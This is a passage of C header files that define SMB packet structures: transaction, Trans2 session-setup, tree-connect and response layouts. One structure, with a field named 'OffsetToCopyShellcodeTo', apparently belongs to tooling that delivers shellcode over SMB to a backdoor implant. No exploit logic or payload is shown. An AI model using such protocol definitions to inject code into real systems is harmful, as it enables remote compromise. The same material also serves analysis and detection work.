161 | WORD DataDisplacement;
162 | WORD ByteCount;
163 | BYTE Buffer[1];
164 | // UCHAR Pad1[];
165 | // UCHAR Trans_Parameters[ParameterCount];
166 | // UCHAR Pad2[];
167 | // UCHAR Trans_Data[DataCount];
168 | }REQ_TRANSACTION_SECONDARY, * PREQ_TRANSACTION_SECONDARY;
169 |
170 | typedef struct _REQ_TRANSACTION2 {
171 | BYTE WordCount;
172 | WORD TotalParameterCount;
173 | WORD TotalDataCount;
174 | WORD MaxParameterCount;
175 | WORD MaxDataCount;
176 | BYTE MaxSetupCount;
177 | BYTE Reserved1;
178 | WORD Flags;
179 | DWORD Timeout;
180 | WORD Reserved2;
181 | WORD ParameterCount;
182 | WORD ParameterOffset;
183 | WORD DataCount;
184 | WORD DataOffset;
185 | BYTE SetupCount;
186 | BYTE Reserved3;
187 | BYTE Buffer[1];
188 | }REQ_TRANSACTION2, * PREQ_TRANSACTION2;
189 |
190 | typedef struct _TRANS2_SESSION_SETUP_PARAMETERS {
191 | union {
192 | struct {
193 | DWORD LengthOne;
194 | DWORD LengthTwo;
195 | DWORD OffsetToCopyShellcodeTo;
196 | };
197 | DWORD ParameterDoublewords[3];
198 | BYTE ParameterBytes[sizeof(DWORD) * 3];
199 | };
200 | }TRANS2_SESSION_SETUP_PARAMETERS, * PTRANS2_SESSION_SETUP_PARAMETERS;
201 |
202 |
203 |
204 | typedef struct _REQ_TRANSACTION2_SESSION_SETUP {
205 | WORD SubCommand; //should be 0x000e
206 | WORD ByteCount; //should be DataCount + 13 (sizeof(TRANS2_SESSION_SETUP_PARAMETERS) + 1 should eq. 13)
207 | BYTE Padding[1]; //should be 0x00
208 | TRANS2_SESSION_SETUP_PARAMETERS SessionSetupParameters; //Trans2 SESSION_SETUP Params
209 | BYTE SessionSetupData[1]; //Trans2 SESSION_SETUP Data
210 | }REQ_TRANSACTION2_SESSION_SETUP, * PREQ_TRANSACTION2_SESSION_SETUP;
211 |
212 |
213 | typedef struct _RESP_TRANSACTION2 {
214 | BYTE WordCount;
215 | WORD TotalParameterCount;
216 | WORD TotalDataCount;
217 | WORD Reserved1;
218 | WORD ParameterCount;
219 | WORD ParameterOffset;
220 | WORD ParameterDisplacement;
221 | WORD DataCount;
222 | WORD DataDisplacement;
223 | BYTE SetupCount;
224 | BYTE Reserved2;
225 | BYTE Buffer[1];
226 | }RESP_TRANSACTION2, * PRESP_TRANSACTION2;
227 |
228 | #pragma pack(pop)
--------------------------------------------------------------------------------
/treeconnectandx.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "sessionsetupandx.h"
3 |
4 | #pragma pack(push, 1)
5 |
6 | typedef struct REQ_TREE_CONNECT_ANDX {
7 | BYTE WordCount;
8 | ANDX Andx;
9 | WORD Flags;
10 | WORD PasswordLength;
11 | WORD Bytecount;
12 | union {
13 | struct {
14 | BYTE Password;
15 | BYTE Buffer[1];
16 | };
17 | BYTE Bytes[2];
18 | };
19 | }*PREQ_TREE_CONNECT_ANDX;
20 |
21 | #pragma pack(pop)
22 |
--------------------------------------------------------------------------------
/windowssocket.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #define UNICODE
3 | #include
4 | #include
5 | #include
6 | #include
7 |
--------------------------------------------------------------------------------